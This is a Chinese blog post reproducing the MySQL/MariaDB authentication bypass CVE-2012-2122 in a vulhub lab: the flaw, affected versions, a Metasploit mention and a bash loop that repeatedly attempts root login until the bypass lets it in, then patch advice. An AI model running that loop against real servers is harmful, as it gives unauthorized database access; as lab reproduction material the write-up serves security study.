当前位置:   article > 正文

Mysql CVE-2012-2122(vulhub)漏洞复现_cve-2012-2122漏洞复现

cve-2012-2122漏洞复现

1.漏洞简介


当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

2.受影响的版本


MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

3.漏洞复现

拉去镜像环境

 

 查看mysql版本,符合复现环境

 执行msfconsole

 run也可以用exploit替代

 执行下面的循环尝试破解

  1. for i in `seq 1 1000`;do mysql -uroot -p123456 -h 192.168.182.131 -P3306;done
  2. # -u 指定用户名
  3. # -p 指定密码
  4. # -h 指定ip
  5. # -P 指定端口
  6. # for i in `seq 1 1000` 循环1-1000

 数据库默认账号:root,密码:123456

 

4.漏洞解决办法

   1、升级官方补丁

   2、更新mysql

如想了解hvv期间漏洞的poc可关注微信公众号:猫蛋儿安全

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/运维做开发/article/detail/987372
推荐阅读
相关标签
  

闽ICP备14008679号